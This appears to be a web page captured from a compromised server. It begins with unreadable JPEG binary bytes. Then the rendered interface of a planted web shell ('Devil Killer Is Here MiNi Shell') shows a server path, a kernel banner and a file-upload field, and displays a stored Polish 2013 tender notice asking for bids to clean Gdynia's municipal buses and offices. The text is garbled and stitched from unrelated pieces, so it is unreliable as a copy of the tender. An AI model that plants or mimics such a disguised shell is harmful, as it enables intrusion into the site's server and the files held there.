JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130524/89099-N-2013.html

<p class="kh_header"><b>Gdynia: świadczenie usług porządkowych w zakresie sprzątania: autobusów (wewnątrz), pomieszczeń dyspozytorni wraz z otoczeniem, budynku warsztatowo-administracyjnego, pomieszczeń biurowych Przedsiębiorstwa Komunikacji Miejskiej sp. z o.o.  z siedzibą w Gdyni</b><br>
<b>Numer ogłoszenia: 89099 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunikacji Miejskiej Sp. z o.o. , ul. Chwaszczyńska 169, 81-571 Gdynia, woj. pomorskie, tel. 058 6290926, faks 058 6290946.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pkmgdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług porządkowych w zakresie sprzątania: autobusów (wewnątrz), pomieszczeń dyspozytorni wraz z otoczeniem, budynku warsztatowo-administracyjnego, pomieszczeń biurowych Przedsiębiorstwa Komunikacji Miejskiej sp. z o.o.  z siedzibą w Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego  jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług porządkowych w zakresie sprzątania: autobusów (wewnątrz), pomieszczeń dyspozytorni  wraz z otoczeniem , pomieszczeń budynku warsztatowo-administracyjnego , pomieszczeń biurowych, Przedsiębiorstwa Komunikacji Miejskiej sp. z o.o. . 
Wykaz  autobusów w których będą prowadzone usługi  porządkowe w zakresie sprzątania: długość  autobusu 18 m, ilość autobusów: 42, długość autobusu: 12 m, ilość autobusów: 51. Szczegółowy zakres usług porządkowych  dot. Sprzątania autobusów  ( wewnątrz ): a)  sprzątanie codzienne: przez 7 (słownie: siedem ) dni w tygodniu, od godz. 19.00 - 5.00, ilości: od poniedziałku do piątku  93 szt  (+ -  2 szt ), w soboty 55 szt  ( różnej długości ), w niedziele i święta 47 szt  (różnej długości). Zakres czynności dotyczący sprzątania codziennego wnętrza  autobusów: zamiatanie, mopowanie podłóg i schodów, przetarcie wewnętrznych szyb i uszczelek, przetarcie zabrudzonych powierzchni wewnętrznego poszycia oraz drzwi, przetarcie pokrycia siedzeń, oparć, poręczy, uchwytów wywietrzników dachowych, przetarcie tylnej półki oraz obudów siłowników drzwiowych , mycie szyb grodziowych, przetarcie zakurzonych opończy oraz nadkoli wewnątrz autobusu, przetarcie podłogi w kabinie kierowcy, usuwanie śmieci z trudno dostępnych miejsc między innymi za siedzeniami i nadkolami. b) sprzątanie gruntowne wnętrz autobusów : od godz. 21.00  do godz. 5.00, z niedzieli na poniedziałek -  noc, z poniedziałku na wtorek -  noc, z wtorku na środę -  noc, z środy na czwartek -  noc  mycie  opończy (42 sztuki), z czwartku na piątek -  noc, wg wariantu: 1 autobus  przegubowy oraz 1 autobus standard. Zakres czynności dotyczący  sprzątania   gruntownego  wnętrza autobusu : mycie sufitów z wywietrznikami dachowymi, mycie siedzeń PCV , pranie siedzeń z  tkanin dwa razy w roku w terminie wskazanym przez Zamawiającego, mycie ścian bocznych, mycie wszystkich szyb wewnątrz  wraz z uszczelkami, mycie kabiny kierowcy oraz czyszczenie płynem deski rozdzielczej (kokpitu), mycie opończy, mycie drzwi, mycie stopni, mycie wszystkich półek i osłon mechanizmów, mycie podłogi, po okresie zimowym wypłukanie z piasku stopni drzwi pasażerskich  -  termin wykonania do uzgodnienia z Zamawiającym, w autobusach m-ki Mercedes w celu dokładnego posprzątania pracownicy PKM odkręcą siedzenie tylne.
Sprzątanie   pomieszczeń dyspozytorni -  ok. 309  m2 wraz z otoczeniem polega na  codziennym sprzątaniu wszystkich pomieszczeń wg poniższego  zakresu : mycie podłóg  (gres , wykł. tarket), wycieranie kurzu - meble , drzwi , parapety, mycie okien z ościeżnicami i żaluzjami trzy razy w roku ( 65 m2), nabłyszczanie podłóg w pokojach biurowych dwa razy w miesiącu lub akrylowaniwe dwa razy  w roku, mycie ścian i podłóg w pomieszczeniach toalet , mycie szyb w drzwiach oraz w pom dyspozytora, zamiatanie  chodnika wokół budynku  i palarni 103 m2 ( bez odśnieżania), uzupełnianie w trzech pomieszczeniach pojemników: papier toaletowy trzy warstwowy biały  miękki - duże rolki   nie dopuszcza się papieru  szarego , ręczniki papierowe  Z koloru białego lub  zielonego  - w pomieszczeniu ambulatorium - UWAGA : nie dopuszcza się ręczników szarych, mydło w płynie (z mleczkiem np.migdałowym), ręczniki przemysłowe 2-warstwowe (rolka na stojaku- szt.2) w toalecie damskiej i męskiej, Wykonawca będzie zobowiązany do zamontowania w toalecie damskiej i męskiej odświeżacza powietrza i bieżącej wymiany wkładów w obu odświeżaczach , ze środków wymienionych w pkt.7  będzie korzystać, 10 pracowników pracujących   8 godz. ( poniedziałek-piątek), 2 osoby przebywają  całą dobę  (7 dni w tygodniu), ok 200 kierowców rozpoczynających  lub kończących służbę  na dyspozytorni: (poniedziałek-piątek , sobota niedziela ok 100 kierowców).
Wykonawca zobowiązany jest do zapewnienia  obecności osób/osoby sprzątającej w godzinach od: 12.00-19.00  w dniach od poniedziałku do piątku. 
Sprzątanie  budynku warsztatowo-   administracyjnego - ok.1 280 m2. a) Sprzątanie zaplecza ok 380 m2  polega na  sprzątaniu  od poniedziałku do piątku wszystkich pomieszczeń  wg poniższego zakresu: sprzątanie stołówki- polegające na myciu podłóg (gres) i stołów dwa razy dziennie , utrzymaniu w czystości ścian, parapetów oraz , w razie potrzeby, okien z ramami, sprzątanie wszystkich pomieszczeń  zaplecza warsztatowego / parapety , ściany, szafki,  podłogi, drzwi; mycie  korytarza, mycie okien z ościeżnicami i żaluzjami  3 razy w ciągu roku (65m2), mycie ścian wzdłuż  kanału OC (44m2), zlewu  na hali , sprzątanie Stacji Diagnostycznej , biuro codziennie od poniedziałku do piątku, hala stacji  ok 210 m2 - dwa razy  w tygodniu, bieżące utrzymywanie w czystości kanału przeglądowego ,  mycie podłogi w magazynie 2 razy w tygodniu - po uzgodnieniu z pracownikiem,  nabłyszczanie podłóg z PCV dwa razy w miesiącu lub dwa razy w roku arylowanie w dwóch pomieszczeniach - kierownika serwisu  ( o powierzchni 10 m2 ) i inspektora bhp ( o powierzchni 10 m2).
UWAGA: Wykonawca zobowiązany jest do zapewnienia obecności osoby/osób wykonujących w/w czynności w godzinach: od 6.00  do 14.00.
b/ Sprzątanie hali obsługowo - naprawczej wraz  z kanałami - powierzchnia ok 900 m2 w tej pow. znajdują się 3 (trzy) kanały  o dłg. 34,5 m, szerokości 0,90 m oraz głebokości 1,65 m  -  odbywać się będzie  1 (jeden)  raz  w miesiącu  po wcześniejszym uzgodnieniu terminu z kierownictwem zajezdni wg poniższego zakresu: mycie zaolejonej posadzki typu Armorex, mycie kanałów - ściany i posadzka. 
WYKONAWCA zobowiązany jest do zapewnienia  obecności osób/osoby sprzątającej  w godzinach od: 12.00-19.00  w dniach od poniedziałku do piątku . 
Do WYKONAWCY należeć będzie także  uzupełnianie  pojemników w  toaletach damskich, męskich   w śniadalni , na hali
Toalety: papier toaletowy trzy warstwowy biały  miękki - duże rolki   (nie dopuszcza się papieru  szarego)-  trzy pojemniki, mydło w płynie    ( z mleczkiem np.migdałowym ) trzy pojemniki, ręczniki papierowe  Z  koloru białego lub  zielonego  ( nie dopuszcza się ręczników szarych ) -  dwa pojemniki.
Śniadalnia: mydło w płynie  ( z mleczkiem np. migdałowym ), pastę BHP półpłynna (pasta   do rąk w żelu AMERICOL, firmy Americol bv,Sluispolderweg 33 1505 HJ Zaandam Holland lub równoważna pod względem użytkowym ), ręczniki przemysłowe 2-warstwowe ( rolka na stojaku) 
Hala: pasta półpłynna (parametry jw.), ręczniki przemysłowe 2-warstwowe ( rolka na stojaku) .
Na zapleczu: praca trwa na  trzy zmiany 7 dni w tygodniu ,  w ciągu doby  na zapleczu z ww środków  korzysta ok. 60 osób.
Sprzątanie  pomieszczeń biurowych -  ok. 380  m2
Sprzątanie pomieszczeń biurowych odbywać się będzie od poniedziałku do piątku od godziny
 14.30 - 18.30  wg poniższego zakresu: toalety  - mycie sanitariatów , ścian ,podłóg, zamiatanie , mycie podłóg z PCV  - wszystkie pomieszczenia , wycieranie kurzu   - parapety, meble, drzwi, odkurzanie wykładzin dywanowych - 4 pomieszczenia, nabłyszczanie podłóg z PCV - dwa razy w miesiącu lub dwa razy w roku arylowanie, pranie wykładzin dywanowych raz w roku, mycie naczyń w pomieszczeniu gospodarczym, mycie okien z ościeżnicami i żaluzjami dwa razy w roku
Uzupełnianie  w toaletach oraz w pomieszczeniu  socjalnym n/w asortymentów: papier toaletowy trzy warstwowy biały  miękki - duże rolki   (nie dopuszcza się papieru  szarego)- dwa pojemniki, mydło w płynie (z mleczkiem np.migdałowym) - 4 pojemniki, ręczniki papierowe typu Z - koloru białego lub  zielonego  (nie dopuszcza się ręczników szarych )- trzy pojemniki, odświeżacze automatyczne - szt. 2
z ww środków korzysta  ok. 20 osób codziennie  od poniedziałku do piątku .
WYKONAWCA zobowiązany jest do zapewnienia  obecności osób/osoby sprzątającej  w godzinach od: 14.30-18.30  w dniach od poniedziałku do piątku . 
Wspólne postanowienia dotyczące ww usług: WYKONAWCA  musi posiadać sprzęt zapewniający prawidłowe wykonanie przedmiotu zamówienia, zabezpieczyć we własnym zakresie środki czystości oraz odzież ochronną (kombinezony, buty ochronne, kurtki zimowe-z odblaskami itp.),  WYKONAWCA zobowiązany jest do zapewnienia odpowiedniej ilości osób celem zabezpieczenia  należytego  wykonania  przedmiotu zamówienia , w tym brygadzistę , który odpowiedzialny będzie  za koordynację codzienną pomiędzy mistrzem zmianowym, a pracownikami WYKONAWCY.   WYKONAWCA   zostaną udostępnione pomieszczenia do przechowywania narzędzi. Posiłki, pracownicy WYKONAWCY, będą spożywać w śniadalni  w  godzinach ustalonych z mistrzem zmianowym.   WYKONAWCA odpowiedzialny jest za stan techniczny i porządek w udostępnionych pomieszczeniach
2. Wykonawca będzie zobowiązany do zapewnienia  kadry wykonawczej przedmiotu zamówienia, sprzętu i środków czystości niezbędnych do wykonania przedmiotu zamówienia-  we własnym zakresie i na własny koszt .
Wykonawca jest zobowiązany do wskazania środków czystości, których użyje do realizacji przedmiotu zamówienia (treść wymaganego wykazu stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia).
3. Zamawiający zobowiązany będzie do zabezpieczenia punktów poboru wody przy placu postojowym Zamawiającego (ul.Chwaszczyńska 169). Wykonawca będzie zobowiązany do zapewniania (na koszt własny) sposobu poboru wody do sprzątania autobusów ze wskazanych, przez Zamawiającego, punktów.
Zamawiający udostępni Wykonawcy trzy pomieszczenia  (o powierzchni : 8 m2;  7,5 m2 ; 3 m2 ) wyłącznie w celu przechowywania narzędzi Wykonawcy niezbędnych do realizacji przedmiotu umowy.  
4. Zamawiający wymaga realizacji usług stanowiących przedmiot niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ.
5. Wykonawca - przed terminem składania ofert -może dokonać wizji lokalnej siedziby Zamawiającego i  zapoznać się z warunkami realizacji przedmiotu zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.74.20.00-2, 74.73.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawcy są zobowiązani wnieść wadium w wysokości 12 000 zł (słownie: dwanaście tysięcy złotych). Wykonawcy zobowiązani są dołączyć do oferty dowód wpłacenia / wniesienia wadium w wysokości, terminie i formie określonej w Specyfikacji Istotnych Warunków Zamówienia dotyczącej przedmiotowego postępowania o udzielenie zamówienia publicznego. 2/ Zabezpieczenie należytego wykonania umowy: 10% (słownie: dziesięć procent) ceny pomnożonej przez 12 (słownie: dwanaście)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w powyższym  zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem (w przypadku świadczeń okresowych lub ciągłych również wykonywaniem) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie: 
a) jednej usługi sprzątania pomieszczeń o wartości brutto minimum 36 000 zł (słownie: trzydzieści  sześć  tysięcy złotych) oraz 
b) jednej usługi sprzątania autobusów lub/i trolejbusów lub/i tramwajów lub/i wagonów kolejowych  (do przewozu osób) o wartości brutto  minimum 220 000 zł (słownie: dwieście dwadzieścia tysięcy złotych).
2. Ocena spełniania przez Wykonawcę w/w warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych w tym postępowaniu przez Wykonawcę - dokumentów i oświadczeń wg formuły spełnia/nie spełnia.
3. Wśród głównych usług, potwierdzonych dowodami, powinny się znaleźć usługi potwierdzające spełnianie warunków udziału w postępowaniu, o których mowa w pkt. 1.
4. Wykonawca może polegać na zasobach innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5. Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości usług należy przeliczyć wg średniego kursu NBP na dzień publikacji ogłoszenia, podając datę i kurs.
6. W przypadku Wykonawców składających ofertę wspólną należy załączyć jeden wspólny wykaz usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunek ten zostanie spełniony, jeżeli Wykonawca legitymuje się ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej  z przedmiotem zamówienia na kwotę nie niższą od 500 000  zł (słownie: pięćset tysięcy  złotych).   
2. Ocena spełniania przez Wykonawcę ww warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych w tym postępowaniu przez Wykonawcę - dokumentów i oświadczeń  wg formuły spełnia/nie spełnia.
3. Wykonawca może polegać na zasobach innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Wartości podane w dokumentach w walutach innych niż PLN należy przeliczyć wg średniego kursu NBP na dzień wystawienia dokumentu, podając datę i kurs.
5. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

